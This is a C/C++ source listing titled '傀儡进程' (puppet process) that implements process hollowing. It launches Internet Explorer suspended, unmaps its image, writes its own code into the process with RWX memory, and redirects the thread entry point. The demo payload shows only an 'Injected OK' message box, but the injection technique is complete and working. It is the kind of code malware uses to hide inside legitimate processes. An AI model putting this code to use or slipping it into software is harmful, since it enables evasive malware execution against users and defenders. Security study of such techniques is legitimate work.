傀儡进程

#include "stdafx.h" #include <windows.h> typedef long NTSTATUS; typedef NTSTATUS (__stdcall *pfnZwUnmapViewOfSection)(         IN HANDLE ProcessHandle,         IN LPVOID BaseAddress         ); BOOL CreateIEProcess(); PROCESS_INFORMATION pi  = {0}; DWORD GetCurModuleSize(DWORD dwModuleBase); DWORD GetRemoteProcessImageBase(DWORD dwPEB); DWORD GetNewEntryPoint(); void TestFunc(); // pfnZwUnmapViewOfSection ZwUnmapViewOfSection; int _tmain(int argc, _TCHAR* argv[]) {         ZwUnmapViewOfSection = (pfnZwUnmapViewOfSection)GetProcAddress(                 GetModuleHandleA("ntdll.dll"),"ZwUnmapViewOfSection");         printf("ZwUnmapViewOfSection : 0x%08X.\n",ZwUnmapViewOfSection);         if ( !ZwUnmapViewOfSection )          {                 printf("Get ZwUnmapViewOfSection Error.\n");                 goto __exit;          }         if ( !CreateIEProcess() )          {                 goto __exit;          }         printf("TargetProcessId : %d.\n",pi.dwProcessId);         HMODULE hModuleBase = GetModuleHandleA(NULL);         printf("hModuleBase : 0x%08X.\n",hModuleBase);         DWORD dwImageSize = GetCurModuleSize((DWORD)hModuleBase);         printf("ModuleSize : 0x%08X\n",dwImageSize);                  CONTEXT ThreadCxt;         ThreadCxt.ContextFlags = CONTEXT_FULL|CONTEXT_DEBUG_REGISTERS;         GetThreadContext(pi.hThread,&ThreadCxt);         printf("Target PEB Addr : 0x%08X.\n",ThreadCxt.Ebx);         DWORD dwRemoteImageBase = GetRemoteProcessImageBase(ThreadCxt.Ebx);         printf("RemoteImageBase : 0x%08X.\n",dwRemoteImageBase);                  ZwUnmapViewOfSection(pi.hProcess,(LPVOID)dwRemoteImageBase);         LPVOID lpAlloAddr = VirtualAllocEx(                 pi.hProcess,                 hModuleBase,                 dwImageSize,                 MEM_RESERVE | MEM_COMMIT,                 PAGE_EXECUTE_READWRITE                 );         if ( lpAlloAddr )          {                 printf("Alloc Remote Addr OK.\n");          }         else         {                 printf("Alloc Remote Addr Error.\n");          }         WriteProcessMemory(                 pi.hProcess,hModuleBase,                 hModuleBase,dwImageSize,NULL );         printf("Write Image data OK.\n");         ThreadCxt.ContextFlags = CONTEXT_FULL;         ThreadCxt.Eax = GetNewEntryPoint();         SetThreadContext(pi.hThread,&ThreadCxt);         ResumeThread(pi.hThread);         printf("finished.\n"); __exit:         //TerminateProcess(pi.hProcess,0);         system("pause");         return 0; } BOOL CreateIEProcess() {         wchar_t wszIePath[] = L"C:\\Program Files\\Internet Explorer\\iexplore.exe";         STARTUPINFO si = {0};         si.cb = sizeof(si);         BOOL bRet;         bRet = CreateProcessW(                 NULL,wszIePath,                 NULL,NULL,FALSE,CREATE_SUSPENDED,                 NULL,NULL,                  &si,&pi );         if ( bRet )                 printf("Create IE Ok.\n");         else                 printf("Create IE error.\n");         return bRet; } DWORD GetCurModuleSize(DWORD dwModuleBase) {         PIMAGE_DOS_HEADER pDosHdr = (PIMAGE_DOS_HEADER)dwModuleBase;         PIMAGE_NT_HEADERS pNtHdr = (PIMAGE_NT_HEADERS)(dwModuleBase + pDosHdr->e_lfanew);         return pNtHdr->OptionalHeader.SizeOfImage; } DWORD GetRemoteProcessImageBase(DWORD dwPEB) {         DWORD dwBaseRet;         ReadProcessMemory(pi.hProcess,(LPVOID)(dwPEB+8),&dwBaseRet,sizeof(DWORD),NULL);         return dwBaseRet; /* lkd> dt_peb nt!_PEB +0x000 InheritedAddressSpace : UChar +0x001 ReadImageFileExecOptions : UChar +0x002 BeingDebugged     : UChar +0x003 BitField          : UChar +0x003 ImageUsesLargePages : Pos 0, 1 Bit +0x003 SpareBits         : Pos 1, 7 Bits +0x004 Mutant            : Ptr32 Void +0x008 ImageBaseAddress : Ptr32 Void */ } DWORD GetNewEntryPoint() {         return (DWORD)TestFunc; } void TestFunc() {         MessageBoxA(0,"Injected OK","123",0); }